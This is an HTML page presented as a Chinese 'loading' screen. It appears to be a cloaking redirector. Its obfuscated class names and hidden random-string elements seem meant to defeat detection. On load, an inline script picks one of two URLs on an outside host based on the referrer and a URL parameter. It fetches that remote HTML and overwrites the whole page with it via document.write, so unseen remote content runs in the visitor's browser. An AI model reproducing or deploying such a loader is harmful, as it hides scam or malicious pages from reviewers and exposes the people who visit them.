<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .vlf4SDW4XE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .vlf4SDW4XE .MMjDECM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .vlf4SDW4XE .content {
            line-height: 50px;
            text-align: center
        }

        .vlf4SDW4XE .img {
            width: 100%
        }

        .vlf4SDW4XE .VLxh7Uo {
            text-align: center
        }

        .vlf4SDW4XE .VLxh7Uo span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .vlf4SDW4XE .VLxh7Uo span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .vlf4SDW4XE .VLxh7Uo span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .vlf4SDW4XE .VLxh7Uo span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .vlf4SDW4XE .VLxh7Uo span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .vlf4SDW4XE .VLxh7Uo span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .vlf4SDW4XE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kzV2jpeIRPWn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EdVLVqQ = kzV2jpeIRPWn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EdVLVqQ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EdVLVqQ +".html?a=share";
		}
		
        qCFXM6DGK6=url+"#"+new Date().getTime();
        qCFXM6DGK6 && function() {
            $.get(qCFXM6DGK6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ifsoqQ2x41s0gLUuwR3xOrSBjrOwGdCgNvFKYJybjARRdtoPu2yROL5m</b>
<ul style='display:none' >L5eGx34OvHl9AdpfYtLZce7p</ul>
<h1 style='display:none' >ETmpQ9ThBkDrbODwnbNiPXho7dMwFbrt1bdx39RDmfBOcxSvRq674gtCqVIQm5QZu9Ln6FH</h1>
<h1 style='display:none' >ETmpQ9ThBkDrbODwnbNiPXho7dMwFbrt1bdx39RDmfBOcxSvRq674gtCqVIQm5QZu9Ln6FH</h1>
<li style='display:none' >OIaPym1bilp4rsiSfu6Xg4ovyi9d4wjLL6EcrGQ</li>
<p  style='display:none'>FbH7Hy1pDkvy7ZelXnk5M1fo9nzEgo7tJvD9YxUdMYIV5M55JJuX89M4s7iuw65g0dCFYCF4iMTfgwHs5UpzmmBh7mXA9r</p><div class="vlf4SDW4XE">
    <div class="MMjDECM">
        <div class="VLxh7Uo">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>vZ30veKPusdSS1</span>
<span style='display:none'>vZ30veKPusdSS1</span></body>
</html>